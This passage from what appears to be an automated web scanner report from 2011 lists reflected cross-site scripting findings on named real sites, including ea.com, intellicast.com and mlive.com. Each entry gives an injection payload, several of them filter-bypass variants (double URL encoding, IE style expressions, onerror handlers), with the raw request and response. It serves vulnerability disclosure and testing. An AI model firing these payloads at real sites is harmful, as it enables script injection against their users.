HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:04 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=c37dgtcd9v5s Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 75114 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="http://www.digg.com ...[SNIP]... |
3.568. http://www.ea.com/mobile [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /mobile |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d069"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mobile2d069"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:48 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=5rkhii3l0etm Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31127 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.ea.com ...[SNIP]... |
3.569. http://www.ea.com/mobile [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /mobile |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b7f0"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mobile?4b7f0"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:11 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=f6h8smbmcc5e Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 72033 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="http://www.digg.com ...[SNIP]... |
3.570. http://www.ea.com/platform/online-games [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/online-games |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a510c"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platforma510c"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:15 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=r5uc24ode1od Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31141 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.ea.com ...[SNIP]... |
3.571. http://www.ea.com/platform/online-games [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/online-games |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c71d6"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/online-gamesc71d6"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:19 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=hdhctndthgvr Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31142 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.ea.com ...[SNIP]... |
3.572. http://www.ea.com/platform/online-games [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/online-games |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e979"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/online-games?4e979"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:54 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=3v32m4m525g1 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68281 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com ...[SNIP]... |
3.573. http://www.ea.com/platform/pc-games [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/pc-games |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7daef"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform7daef"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:08 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=dp5er2bnu8nk Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31138 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.ea.com ...[SNIP]... |
3.574. http://www.ea.com/platform/pc-games [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/pc-games |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 978f0"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/pc-games978f0"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:12 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=p115287m0igh Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31138 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.ea.com ...[SNIP]... |
3.575. http://www.ea.com/platform/pc-games [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/pc-games |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a13f"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/pc-games?2a13f"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:38 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=i1srfdvvnrvk Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84547 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com ...[SNIP]... |
3.576. http://www.ea.com/platform/ps3-games [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/ps3-games |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1666"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platformd1666"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:22 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=qg2f822huup3 Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31139 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.ea.com ...[SNIP]... |
3.577. http://www.ea.com/platform/ps3-games [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/ps3-games |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ff7"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/ps3-gamesb7ff7"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:26 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=eclo7i73cfql Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31139 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.ea.com ...[SNIP]... |
3.578. http://www.ea.com/platform/ps3-games [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/ps3-games |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82e73"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/ps3-games?82e73"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:49 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=luocner863an Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 85039 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com ...[SNIP]... |
3.579. http://www.ea.com/platform/xbox-360-games [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/xbox-360-games |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9838c"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform9838c"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:13 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=ghogbj07oe5v Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31144 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.ea.com ...[SNIP]... |
3.580. http://www.ea.com/platform/xbox-360-games [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/xbox-360-games |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9216f"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/xbox-360-games9216f"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:17 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=3g5dcbo2tg5k Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31144 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.ea.com ...[SNIP]... |
3.581. http://www.ea.com/platform/xbox-360-games [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/xbox-360-games |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7223"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/xbox-360-games?c7223"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:42 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=9cg06j3gera3 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84502 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com ...[SNIP]... |
3.582. http://www.ea.com/wii [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /wii |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73bb4"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wii73bb4"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:31 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=g1f11esrsvgv Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31123 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.ea.com ...[SNIP]... |
3.583. http://www.ea.com/wii [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /wii |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42ab4"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wii?42ab4"><script>alert(1)< Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:52 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=jinvebj2q69p Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 71389 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com ...[SNIP]... |
3.584. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc- [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.freshnews.com |
Path: | /news/388192/peanut-labs |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a24d"><img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /news/3881925a24d"><img%20src%3da Host: www.freshnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:19:05 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 Set-Cookie: SESSdcb5af41d343fdd7 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 05:19:05 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34913 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/news/3881925a24d"><img src=a onerror=alert(1) ...[SNIP]... |
3.585. http://www.intellicast.com/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.intellicast |
Path: | / |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf718"style%3d"xThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?cf718"style%3d"x Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:44:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: RecentLocations=@:; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Set-Cookie: Pop=0; path=/ Set-Cookie: vw=1; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 64857 Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_ctl00_Head1"> In ...[SNIP]... <a href="/Default.aspx?unit ...[SNIP]... |
3.586. http://www.intellicast.com/Local/Weather.aspx [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.intellicast |
Path: | /Local/Weather.aspx |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36278%2522style%253dThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request
GET /Local/Weather.aspx36278%2522style%253d Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:44:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: RecentLocations=@:; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Set-Cookie: Pop=0; path=/ Set-Cookie: vw=1; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 46829 Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_ctl00_Head1"> In ...[SNIP]... <a href="/Redirect.aspx?unit ...[SNIP]... |
3.587. http://www.intellicast.com/Local/Weather.aspx [location parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.intellicast |
Path: | /Local/Weather.aspx |
Issue detail
The value of the location request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f90ff"style%3d"xThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Local/Weather.aspx Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:44:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: CityId=USMI0020; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Set-Cookie: RecentLocations=Alma, Michigan@USMI0020:; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Set-Cookie: Pop=0; path=/ Set-Cookie: vw=1; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 90956 Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_ctl00_Head1"> In ...[SNIP]... <a href="/Local/Weather.aspx ...[SNIP]... |
3.588. http://www.intellicast.com/Local/Weather.aspx [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.intellicast |
Path: | /Local/Weather.aspx |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54ef9"style%3d"xThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Local/Weather.aspx Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:44:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: CityId=USMI0020; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Set-Cookie: RecentLocations=Alma, Michigan@USMI0020:; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Set-Cookie: Pop=0; path=/ Set-Cookie: vw=1; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 90972 Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_ctl00_Head1"> In ...[SNIP]... <a href="/Local/Weather.aspx ...[SNIP]... |
3.589. http://www.mlive.com/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.mlive.com |
Path: | / |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db83d'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /?db83d'-alert(1)- Host: www.mlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: Apache P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM' Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:44:46 GMT Date: Sun, 09 Jan 2011 01:44:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107437 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... f'; OAS_listpos = 'Leaderboard,SiteSponsor OAS_query = 'db83d'-alert(1)- OAS_target = '_top'; //end of configuration </SCRIPT> ...[SNIP]... |
3.590. http://www.outofhanwell.com/blog/index.php [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.outofhanwell |
Path: | /blog/index.php |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e199a"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e199a"><script>alert(1)< Host: www.outofhanwell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 05:23:20 GMT Server: Apache Content-Length: 2340 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR <html> <head> <title>Error 404 - Not found</title> </head> <frameset rows="100%" framebo ...[SNIP]... <frame src="http://www ...[SNIP]... |
3.591. http://www.outofhanwell.com/blog/index.php [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.outofhanwell |
Path: | /blog/index.php |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30833"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
